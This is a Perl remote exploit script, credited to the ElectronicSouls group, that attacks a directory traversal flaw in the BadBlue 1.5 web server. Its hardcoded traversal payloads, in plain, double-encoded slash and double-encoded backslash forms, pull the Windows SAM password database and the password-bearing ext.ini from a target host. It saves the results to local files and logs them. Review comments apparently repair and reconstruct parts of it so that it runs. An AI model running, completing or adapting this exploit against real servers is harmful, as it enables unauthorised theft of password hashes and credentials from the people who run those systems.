#!/usr/bin/perl
#
# - [ElectronicSouls] Private Do Not Distribute -
#
# Remote Exploit For BadBlue 1.5 Web Server
# www.badblue.com
#
# A directory traversal bug has been discovered in
# BadBlue HTTP Daemon SoftWare. This is a
# trivial bug, yes I know. But it can be kinda
# funny for those days you are bored =)
#
# Vulnerable System: Windows 95
#                    Windows 98
#                    Windows ME
#                    Windows NT 3.5
#                    Windows NT 4.0
#                    Windows 2000
#                    Windows XP
#
# syntax:
#
# -h --- Specify Host Name
# -p --- Specify Host Port
# -o --- For Grabbing Another file (the value is sent verbatim as the request path)
# -l --- For Logging.
# -O --- Specify What OS (values are case sensitive)
#        9x --- For Windows 95/98/mE (Gets the ext.ini with passwords)
#        NT --- For Windows NT 3/4 (Gets sam file and ext.ini)
#        2K --- For Windows 2K SP-012 (Gets sam file and ext.ini)
#        XP --- For Windows XP ALL
#
# perl badxploit.pl -h www.host.com -p 80 -l esh0yday.log -O 9x - For Win/9x
# perl badxploit.pl -h www.host.com -p 80 -l esh0yday.log -O NT - For Win/NT
# perl badxploit.pl -h www.host.com -p 80 -l esh0yday.log -O 2K - For Win/2K
# perl badxploit.pl -h www.host.com -p 80 -l esh0yday.log -O XP - For Win/XP
#
# *************************************************************************
# ** For the '-o' syntax you need to know the exact location of the file **
# ** NOTE! You can only get files from the same drive as BadBlue         **
# ** NOTE! The -o value is placed directly after "GET /", so it must     **
# ** carry its own traversal prefix; a bare "boot.ini" only requests     **
# ** /boot.ini from the web root.                                        **
# **                                                                     **
# ** Eg if($badblue-drive == $c:) {syntax will be get a file C:\boot.ini **
# ** perl badxploit.pl -h www.host.com -p 80 -l es.log -o ..%2f..%2f../boot.ini } **
# ** Now check es.log for the contents of boot.ini =)                    **
# *************************************************************************
#
# You'll figure it out, If you don't understand.
#
# Greets: Websk8ter, BrainStorm, asmodian, _0x90_, divine, FreQ, northern, CraiK
# kokshin, rocky, omnis, NtWaK0, loophole, icesk, tsilik, crazyl0rd, [t]hief
# CraigTM, DeadMouse, irrupt, izik, sagi, ofer, natrix, samko, blah everyone else
# [!ElectronicSouls], HHP
#
# Special THNX AND GREET TO *** Pneuma *** for being there for me =) Luv ya!@
#
# Bug discovered and written by Iceburg of [!ElectronicSouls].
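use Socket;
use Getopt::Std;
use warnings;
# NOTE: 'use strict' is intentionally not enabled here -- the remainder of
# this script (the payload arrays, the test* subs and the LOG handle) relies
# on undeclared package globals, so enabling it would stop the file compiling.

# Every switch takes a value.  -O picks the OS-specific payload list and is
# case sensitive; -o sends a caller-supplied request path instead.
getopts("O:o:h:p:l:", \%args);

print ("\n");
print ("==================================================\n");
print ("== -- Remote Exploit For BadBlue 1.5 WebServers ==\n");
print ("== -- Discovered and Written By Iceburg ==\n");
print ("== -- [ElectronicSouls] Production. ==\n");
print ("==================================================\n");
print ("\n");

# No target: show the switch summary and stop.
if (!defined $args{h}) {
    print qq~
syntax:
  -h --- Specify Host Name
  -p --- Specify Host Port
  -o --- For Grabbing Anothern file
  -l --- For Logging.
  -O --- Specify What OS
    --9x --- For Windows 95/98/mE (Gets the ext.ini with passwords)
    --NT --- For Windows NT 3/4 (Gets sam file and ext.ini)
    --2K --- For Windows 2K SP-012 (Gets sam file and ext.ini)
    --XP --- For Windows XP ALL
Syntax are case sensitive =)
~;
    exit;
}

# Globals read by the connect/test* subs further down.
$host = $args{h};
print "*** Exploiting $host ...\n";

# -p defaults to 80.  Reject anything that is not a TCP port number here,
# rather than letting sockaddr_in() pack it into 16 bits (out-of-range values
# would silently wrap to a different port).
$port = defined $args{p} ? $args{p} : "80";
if ($port !~ /\A[0-9]{1,5}\z/ || $port < 1 || $port > 65535) {
    die ("*** Invalid port '$port' (expected 1-65535)\n");
}

# -l: optional log file.  $log is the flag the test* subs check before they
# write to LOG.  Three-argument open so that leading characters in the path
# (e.g. '>' or '&') cannot be reinterpreted as part of the open mode, which
# the original two-argument ">$file" form allowed.
$log = 0;
if (defined $args{l}) {
    $file = $args{l};
    $log  = 1;
    open (LOG, '>', $file) || die ("*** Cannot open file for logging\n");
    print LOG ("*** [ElectronicSouls] Production\n");
    print LOG ("*** BadBlue 1.5 Remote Exploit\n");
    print LOG ("*** Discovered And Written By Iceburg\n\n");
}

# The traversal strings below use URL encoding (%2f, plus the double-encoded
# %252f / %255c forms).  If none of them work, try adding more
# ..%2F / %252f / %255c segments.  They assume the default install
# directories; for anything else supply the complete request path with -o.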
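# Traversal payloads.  Each list carries the same path in three encodings --
# plain %2f, double-encoded slash %252f and double-encoded backslash %255c --
# so that a server which decodes once, decodes twice, or normalises only one
# separator still lets the request climb out of the document root.  The
# paths assume default install/system directories; otherwise pass the
# complete request path with -o.

# Win9x/mE Strings && WinNT/2K/XP -- BadBlue's ext.ini (which, per the usage
# text, holds the configured passwords).  The leading "[...]" directory name
# is arbitrary: it only has to not exist, so the following "..%2f" climbs
# past it.
@sploits1 = (
    "[ElectronicSouls]/..%2f../ext.ini",   # Main String
    "[0WNZ]/..%252f..%252f../ext.ini",     # Alternative
    "[YOU]/..%255c..%255c../ext.ini",      # Alternative
);

# WinNT Strings
@sploits2 = (
    "..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._",
    "..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._",
    "..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._",
);

# Win2K Strings
@sploits3 = (
    "..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam",
    "..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam",
    "..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam",
);

# WinXP String
@sploits4 = (
    "..%2F..%2F..%2F..%2F..%2F../windows/repair/sam",
    "..%252f..%252f..%252f..%252f..%252f../windows/repair/sam",
    "..%255c..%255c..%255c..%255c..%255c../windows/repair/sam",
);

# -o: a single request with a caller-supplied path.  The value goes straight
# after "GET /", so it must include its own traversal prefix
# (e.g. ..%2f..%2f../boot.ini); a bare "boot.ini" only requests /boot.ini.
if (defined $args{o}) {
    my $string = $args{o};
    print ("*** Using Manual String $string\n");
    my @ocheck = fetch($string);
    if (http_status($ocheck[0]) eq '200') {
        print ("=========================\n");
        print ("*** Server is vulnerable \n");
        print ("=========================\n");
        print ("\n @ocheck\n");
        print ("=========================\n");
        if ($log) {
            print LOG ("==========================\n");
            print LOG ("*** Server is vulnerable \n");
            print LOG ("==========================\n");
            print LOG ("@ocheck\n");
            print LOG ("==========================\n");
        }
        # The original success message was cut off in the archived copy of
        # this script; the wording used by test1 is reused here.
        die ("*** J00 15 kr4d-hax0r n0w\n");
    }
    print ("*** Server is not vulberable to string $string\n");
    # NOTE(review): what the original did after a failed -o request is not
    # visible in the archived copy; stopping here is the conservative choice.
    exit;
}

# -O: OS tag -> sub that walks the matching payload list.
# NOTE(review): the dispatch that tied -O to the test* subs is missing from
# the archived copy (the text between the -o branch and the body of test4 was
# lost).  This table is reconstructed from the usage text in the header and
# from what each sub fetches; confirm it against an intact copy.  Keys are
# case sensitive, as the usage text says.
my %test_for = (
    '9x' => \&test1,   # ext.ini only
    'NT' => \&test2,   # winnt/repair/sam._ then ext.ini
    '2K' => \&test3,   # winnt/repair/sam then ext.ini
    'XP' => \&test4,   # windows/repair/sam then ext.ini
);
if (defined $args{O} && exists $test_for{$args{O}}) {
    $test_for{$args{O}}->();
    # test1 dies as soon as ext.ini comes back, so reaching this line means no
    # ext.ini string worked (a SAM copy may or may not have been saved).
    print ("*** Finished; no ext.ini string worked against $host\n");
} else {
    print ("*** -O must be one of: 9x NT 2K XP (case sensitive)\n");
}

# Win9x/ME: ext.ini only.  Dies (the script's way of stopping) on the first
# string that returns 200; returns normally if none does.
sub test1 {
    foreach my $xploit1 (@sploits1) {
        my @check = fetch($xploit1);
        if (http_status($check[0]) ne '200') {
            print ("*** Server is not vulberable to string $xploit1\n");
            next;
        }
        print ("===============================\n");
        print ("*** Getting contents of ext.ini\n");
        print ("*** Server is vulnerable \n");
        print ("===============================\n");
        print ("\n @check\n");
        print ("===============================\n");
        if ($log) {
            print LOG ("==========================\n");
            print LOG ("*** Server is vulnerable \n");
            print LOG ("*** Contents of ext.ini \n");
            print LOG ("==========================\n");
            # Log the response body.  The original copied from a fixed line 8
            # and its loop bound (<= @check) ran one element past the array.
            print LOG body_of(@check);
            print LOG ("==========================\n");
        }
        die ("*** J00 15 kr4d-hax0r n0w\n");
    }
    return;
}

# WinNT: winnt/repair/sam._ then ext.ini.
sub test2 { return grab_sam(\@sploits2); }

# Win2K: winnt/repair/sam then ext.ini.
sub test3 { return grab_sam(\@sploits3); }

# WinXP: windows/repair/sam then ext.ini.
sub test4 { return grab_sam(\@sploits4); }

# Try each SAM path in $strings in turn; on the first 200 save the response
# body to ./sam and then go after ext.ini with test1().  Returns 1 if a SAM
# copy was saved, 0 otherwise.  Shared by test2/test3/test4, which were
# identical apart from the list (and test2 appended a stray "\n" to every
# line it saved).  The original kept trying the remaining strings after a
# successful fetch; one copy is enough.
sub grab_sam {
    my ($strings) = @_;
    foreach my $xploit (@$strings) {
        my @check = fetch($xploit);
        if (http_status($check[0]) ne '200') {
            print ("*** Server is not vulberable to string $xploit\n");
            next;
        }
        print ("=========================\n");
        print ("*** Server is vulnerable \n");
        print ("*** Getting sam file \n");
        print ("=========================\n");
        print ("\n");
        save_sam(@check);
        test1();
        return 1;
    }
    return 0;
}

# Write the response body to ./sam.  The original copied lines 8..30 of the
# raw response, which assumed exactly seven header lines and truncated
# anything longer than 23 lines.  The body is written in binmode, from the
# first line after the blank header/body separator to the end, and the
# handle is closed so buffered data is flushed and write errors surface.
sub save_sam {
    my @lines = @_;
    open(SAM, '>', 'sam') or do { error(); return; };
    binmode(SAM);
    print SAM body_of(@lines);
    close(SAM) or error();
    return;
}

# Response body: everything after the first empty line (CRLF or LF).
# Returns the whole response unchanged if no separator is found.
sub body_of {
    my @lines = @_;
    for my $i (0 .. $#lines) {
        if ($lines[$i] =~ /\A\r?\n\z/) {
            return @lines[$i + 1 .. $#lines];
        }
    }
    return @lines;
}

# Status code from an HTTP status line ("HTTP/1.0 200 OK" -> "200").
# Returns '' for an undefined or short line so callers can compare with
# eq/ne without "uninitialized" warnings (the original did split() and a
# numeric == on whatever came back, including nothing).
sub http_status {
    my ($status_line) = @_;
    return '' unless defined $status_line;
    my (undef, $code) = split(/ /, $status_line);
    return defined $code ? $code : '';
}

# Connect to $host:$port, send "GET /<path> HTTP/1.0", and return the whole
# response as a list of lines.  Always closes SOCK before returning.
# (The original read with @x=<SOCK>; the handle name was lost in the
# archived copy, leaving "@x=;".)
sub fetch {
    my ($path) = @_;
    open_sock();
    send(SOCK, "GET /$path HTTP/1.0\r\n\r\n", 0)
        or die("Unable to send request: $!");
    my @lines = <SOCK>;
    close(SOCK);
    return @lines;
}

# Open a TCP connection to $host:$port on the SOCK handle.  Named open_sock
# rather than connect (as in the original) because a user sub called
# "connect" sits behind the builtin and was only reachable as "&connect;".
# inet_aton() does not set $!, so its failure gets its own message.
sub open_sock {
    my $iaddr = inet_aton($host) or die("Cannot resolve host $host\n");
    my $paddr = sockaddr_in($port, $iaddr);
    my $proto = getprotobyname('tcp') or die("Error: $!");
    socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die("Failed to open socket: $!");
    connect(SOCK, $paddr) or die("Unable to connect: $!");
    return;
}

# Best-effort error report used by save_sam(); prints and carries on.
sub error {
    print ("For some weird reason a error has occured: $!\n");
    print ("Continueing ...\n");
    return;
}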